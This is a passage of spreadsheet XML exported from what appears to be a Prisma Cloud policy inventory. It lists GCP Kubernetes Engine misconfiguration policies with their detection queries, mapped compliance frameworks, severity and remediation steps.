      <c r="S2869" t="inlineStr"/>
      <c r="T2869" t="b">
        <v>0</v>
      </c>
      <c r="U2869" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2869" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2869" t="inlineStr"/>
      <c r="X2869" t="inlineStr"/>
      <c r="Y2869" t="inlineStr"/>
      <c r="Z2869" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = $.databaseEncryption.state equals DECRYPTED</t>
        </is>
      </c>
      <c r="AA2869" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2869" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2869" t="inlineStr"/>
      <c r="AD2869" t="b">
        <v>0</v>
      </c>
      <c r="AE2869" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2869" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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69" t="inlineStr">
        <is>
          <t>2052e02e-c683-45ba-b5a2-c62192d5dc2b</t>
        </is>
      </c>
      <c r="AI2869" t="inlineStr">
        <is>
          <t>4ac953bb-1e71-4977-b9e4-b0e226cf3391</t>
        </is>
      </c>
      <c r="AJ2869" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2869" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2870">
      <c r="A2870" t="inlineStr">
        <is>
          <t>Adam's SNOW</t>
        </is>
      </c>
      <c r="B2870" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2870" s="2" t="inlineStr"/>
      <c r="D2870" t="inlineStr"/>
      <c r="E2870" t="inlineStr"/>
      <c r="F2870" t="inlineStr"/>
      <c r="G2870" t="b">
        <v>1</v>
      </c>
      <c r="H287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870" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2870" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2870" t="inlineStr">
        <is>
          <t>ADAM CONFIG POLICY MIGRATE CUSTOMER TEST 222222</t>
        </is>
      </c>
      <c r="L2870" t="inlineStr"/>
      <c r="M2870" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2870" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2870" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2870" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2870" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R2870" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="S2870" t="inlineStr"/>
      <c r="T2870" t="b">
        <v>0</v>
      </c>
      <c r="U2870" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2870" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2870" t="inlineStr"/>
      <c r="X2870" t="inlineStr"/>
      <c r="Y2870" t="inlineStr"/>
      <c r="Z2870" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'legacyAbac.enabled equals true'</t>
        </is>
      </c>
      <c r="AA2870" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2870" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2870" t="inlineStr"/>
      <c r="AD2870" t="b">
        <v>0</v>
      </c>
      <c r="AE2870" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2870" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG287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870" t="inlineStr">
        <is>
          <t>5ff723ae-52ff-4183-ab66-efc579629073</t>
        </is>
      </c>
      <c r="AI2870" t="inlineStr">
        <is>
          <t>eed1e9dd-87a7-4dd3-99a2-3c6f3c402a33</t>
        </is>
      </c>
      <c r="AJ2870" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2870" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2871">
      <c r="A2871" t="inlineStr"/>
      <c r="B2871" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2871" s="2" t="inlineStr"/>
      <c r="D2871" t="inlineStr"/>
      <c r="E2871" t="inlineStr"/>
      <c r="F2871" t="inlineStr"/>
      <c r="G2871" t="b">
        <v>0</v>
      </c>
      <c r="H28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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2871" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2871" t="inlineStr">
        <is>
          <t>TEST ADD A NEW POLICY</t>
        </is>
      </c>
      <c r="L2871" t="inlineStr"/>
      <c r="M2871" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2871" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2871" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2871" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2871" t="inlineStr"/>
      <c r="R2871" t="inlineStr"/>
      <c r="S2871" t="inlineStr"/>
      <c r="T2871" t="b">
        <v>0</v>
      </c>
      <c r="U2871" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2871" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2871" t="inlineStr"/>
      <c r="X2871" t="inlineStr"/>
      <c r="Y2871" t="inlineStr"/>
      <c r="Z2871" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' and cloud.type = 'gcp' and json.rule = "_DateTime.ageInDays(createTime) &gt; 3 and resourceLabels.owner does not exist and resourceLabels.Owner does not exist" addcolumn resourceLabels.owner</t>
        </is>
      </c>
      <c r="AA2871" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2871" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2871" t="inlineStr"/>
      <c r="AD2871" t="b">
        <v>0</v>
      </c>
      <c r="AE2871" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2871" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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1" t="inlineStr">
        <is>
          <t>8d08f270-7f30-406c-9fd5-cd458ca3c25d</t>
        </is>
      </c>
      <c r="AI2871" t="inlineStr">
        <is>
          <t>5855d9cf-ecbe-4efe-ae0f-7368140df8f7</t>
        </is>
      </c>
      <c r="AJ2871" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2871" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2872">
      <c r="A2872" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B2872" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2872" s="2" t="inlineStr"/>
      <c r="D2872" t="n">
        <v>3</v>
      </c>
      <c r="E2872" t="n">
        <v>3</v>
      </c>
      <c r="F2872" t="n">
        <v>0</v>
      </c>
      <c r="G2872" t="b">
        <v>1</v>
      </c>
      <c r="H2872" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST_GCP_test, DO NOT TOUCH - PCS SWAT - Email Only,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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2872" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2872" t="inlineStr">
        <is>
          <t>GCP GKE - 3 Days -  No Owner</t>
        </is>
      </c>
      <c r="L2872" t="inlineStr"/>
      <c r="M2872" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2872" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2872" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2872" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2872" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R2872" t="inlineStr">
        <is>
          <t>5.1.3 Config - Compute Resource with No Owner</t>
        </is>
      </c>
      <c r="S2872" t="inlineStr"/>
      <c r="T2872" t="b">
        <v>0</v>
      </c>
      <c r="U2872" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2872" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2872" t="inlineStr"/>
      <c r="X2872" t="inlineStr"/>
      <c r="Y2872" t="inlineStr"/>
      <c r="Z2872" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-container-describe-clusters' and cloud.type = 'gcp' and json.rule = "_DateTime.ageInDays(createTime) &gt; 3 and resourceLabels.owner does not exist and resourceLabels.Owner does not exist" addcolumn resourceLabels.owner</t>
        </is>
      </c>
      <c r="AA2872" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2872" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2872" t="inlineStr"/>
      <c r="AD2872" t="b">
        <v>0</v>
      </c>
      <c r="AE2872" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2872" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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DO NOT TOUCH - PCS SWAT - Email Only - Notifications:email, AccountGroups:PCS SWAT Account Group - DO NOT TOUCH;,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2" t="inlineStr">
        <is>
          <t>b394bb09-2ba2-4a65-ba36-732ce6e3a944</t>
        </is>
      </c>
      <c r="AI2872" t="inlineStr">
        <is>
          <t>5855d9cf-ecbe-4efe-ae0f-7368140df8f7</t>
        </is>
      </c>
      <c r="AJ2872" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2872" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2873">
      <c r="A2873" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, CIS v1.4.0 (GKE) - Level 1, NIST CSF v2.0, ISO/IEC 27017:2015, ISO 27002:2022, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8, CSA CCM v.4.0.1, PCI DSS v4.0, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, tadenugba Copy of CIS v1.1.0 (GKE), kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, ISO 27001:2013, CIS v1.0.0 (GCP), CIS v1.5.0 (GKE) - Level 1, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.1.0 (GKE), NIST SP 800-172, Copy of CIS Controls v8, TX-RAMP Level 2, ISO 27001:2013, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CIS Controls v8, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CSA CCM v.4.0.1, SOC 2, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v3.2.1, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, CRI Profile v1.2.1, ISO 27001:2013, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, NIST CSF, kashan ACSC Information Security Manual (ISM), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), CRI Profile v1.2.1, CSA CCM v.4.0.6, ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, CIS v1.3.0 (GKE) - Level 1, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, CIS v1.2.0 (GKE)</t>
        </is>
      </c>
      <c r="B2873" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2873" s="2" t="inlineStr"/>
      <c r="D2873" t="inlineStr"/>
      <c r="E2873" t="inlineStr"/>
      <c r="F2873" t="inlineStr"/>
      <c r="G2873" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2873" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2873" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Cloud Logging disabled</t>
        </is>
      </c>
      <c r="L2873" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2873" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2873" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2873" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2873" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2873" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2873" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2873" t="inlineStr"/>
      <c r="T2873" t="b">
        <v>0</v>
      </c>
      <c r="U2873" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2873" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2873" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which have disabled Cloud Logging. Enabling Cloud Logging will let the Kubernetes Engine to collect, process, and store your container and system logs in a dedicated persistent data store.</t>
        </is>
      </c>
      <c r="X2873" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to 'Kubernetes Engine' (Left Panel)
3. Select 'Clusters'
4. From the list of clusters, click on the reported cluster
5. Under 'Features', click on the edit button (pencil icon) in front of 'Cloud Logging'
6. In the 'Edit Cloud Logging' dialog, enable the 'Enable Cloud Logging' checkbox
7. Select components to be logged
8. Click on 'Save Changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1</t>
        </is>
      </c>
      <c r="Y2873" t="inlineStr"/>
      <c r="Z2873" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'loggingService does not exist or loggingService equals none'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2873" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2873" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2873" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-143-CKV_GCP_1</t>
        </is>
      </c>
      <c r="AD2873" t="b">
        <v>1</v>
      </c>
      <c r="AE2873" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2873" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>53793c32-dd41-430f-bbea-2f002ddafe42</t>
        </is>
      </c>
      <c r="AI2873" t="inlineStr">
        <is>
          <t>8a072630-8e86-45eb-98cf-c4c234a1cccc</t>
        </is>
      </c>
      <c r="AJ2873" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2873" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2874">
      <c r="A2874" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, tadenugba Copy of CIS v1.1.0 (GKE), APRA (CPS 234) Information Security, CIS Controls v8.1, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST CSF, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.6, NIST SP 800-171 Revision 3, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v3.2.1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, CIS Controls v7.1, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.3.0 (GKE) - Level 1, CIS Controls v8, APRA (CPS 234) Information Security, Copy of CIS Controls v8, CIS v1.4.0 (GKE) - Level 1, HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CIS v1.5.0 (GKE) - Level 1, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, CIS v1.1.0 (GKE), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), CIS v1.2.0 (GKE), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2874" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2874" s="2" t="inlineStr"/>
      <c r="D2874" t="inlineStr"/>
      <c r="E2874" t="inlineStr"/>
      <c r="F2874" t="inlineStr"/>
      <c r="G2874" t="b">
        <v>1</v>
      </c>
      <c r="H28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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2874" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2874" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster Shielded GKE Nodes feature disabled</t>
        </is>
      </c>
      <c r="L2874" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2874" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2874" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2874" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2874" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2874" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2874" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2874" t="inlineStr"/>
      <c r="T2874" t="b">
        <v>0</v>
      </c>
      <c r="U2874" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2874" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2874" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes clusters for which the Shielded GKE Nodes feature is not enabled. Shielded GKE nodes protect clusters against boot- or kernel-level malware or rootkits
which persist beyond infected OS. It is recommended to enable Shielded GKE Nodes for all the Kubernetes clusters.
FMI: https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes</t>
        </is>
      </c>
      <c r="X2874" t="inlineStr">
        <is>
          <t>1. Log in to Google cloud console
2. Navigate to Google Kubernetes Engine, click on 'Clusters' to get the list
3. Browse the alerted cluster
4. Click on the 'Edit' button on top
5. From the drop-down for 'Shielded GKE Nodes' select 'Enable'
6. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled</t>
        </is>
      </c>
      <c r="Y2874" t="inlineStr"/>
      <c r="Z2874" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = shieldedNodes.enabled does not exist or shieldedNodes.enabled equals "false"
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2874" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2874" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2874" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-566-CKV_GCP_71</t>
        </is>
      </c>
      <c r="AD2874" t="b">
        <v>1</v>
      </c>
      <c r="AE2874" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2874" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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4" t="inlineStr">
        <is>
          <t>7b14d2f7-0632-4adf-97c9-8c88b1d7f084</t>
        </is>
      </c>
      <c r="AI2874" t="inlineStr">
        <is>
          <t>706e0406-3a74-4c5b-b4ef-7a9392d42733</t>
        </is>
      </c>
      <c r="AJ2874" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2874" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2875">
      <c r="A2875" t="inlineStr">
        <is>
          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS Controls v7.1, NIST SP 800-172, ISO/IEC 27017:2015, ISO 27002:2022, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST CSF, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS Controls v8.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.4.0 (GKE) - Level 1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, CRI Profile v1.2.1, ISO/IEC 27002:2013, CIS v1.5.0 (GKE) - Level 1, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, tadenugba Copy of CIS v1.1.0 (GKE), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CIS v1.2.0 (GKE), New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, CIS Controls v8, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CIS v1.1.0 (GKE), HITRUST v.9.4.2 [Deprecated], FFIEC, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, CIS v1.3.0 (GKE) - Level 1, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2875" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2875" s="2" t="inlineStr"/>
      <c r="D2875" t="inlineStr"/>
      <c r="E2875" t="inlineStr"/>
      <c r="F2875" t="inlineStr"/>
      <c r="G2875" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2875" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2875" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Alpha cluster feature enabled</t>
        </is>
      </c>
      <c r="L2875" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2875" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2875" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2875" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2875" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2875" t="inlineStr">
        <is>
          <t>CIS Control 16</t>
        </is>
      </c>
      <c r="R2875" t="inlineStr">
        <is>
          <t>16.8</t>
        </is>
      </c>
      <c r="S2875" t="inlineStr"/>
      <c r="T2875" t="b">
        <v>0</v>
      </c>
      <c r="U2875" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2875" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2875" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine Clusters which have enabled alpha cluster. It is recommended to not use alpha clusters or alpha features for production workloads. Alpha clusters expire after 30 days and do not receive security updates. This cluster will not be covered by the Kubernetes Engine SLA.</t>
        </is>
      </c>
      <c r="X2875" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters alpha feature cannot be disabled once it is created. So to resolve this alert, create a new cluster with the alpha feature disabled, then migrate all required cluster data from the reported cluster to this newly created cluster and delete reported Kubernetes engine cluster.
To create new Kubernetes engine cluster with the alpha feature disabled, perform the following: 
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on CREATE CLUSTER button
5. Set new cluster parameters as per your requirement and make sure 'Enable Kubernetes alpha features in this cluster' is unchecked.
6. Click on Save
To delete reported Kubernetes engine cluster, perform the following:
1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. Click on reported Kubernetes cluster
5. Click on the DELETE button
6. On 'Delete a cluster' popup dialog, Click on DELETE to confirm the deletion of the cluster. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-2-19
IaC: Refer the documentation for more details,
